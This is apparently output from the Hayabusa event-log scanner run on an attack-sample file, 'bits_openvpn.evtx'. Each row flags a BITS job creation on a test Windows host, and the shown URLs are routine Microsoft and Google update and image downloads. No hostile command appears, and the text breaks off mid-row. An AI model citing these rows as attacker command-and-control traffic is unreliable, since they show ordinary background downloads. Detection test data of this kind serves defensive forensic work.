https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job 
Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification 
Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: 
http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: 
http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:25.377 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:59.449 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:42.355 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:59.420 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 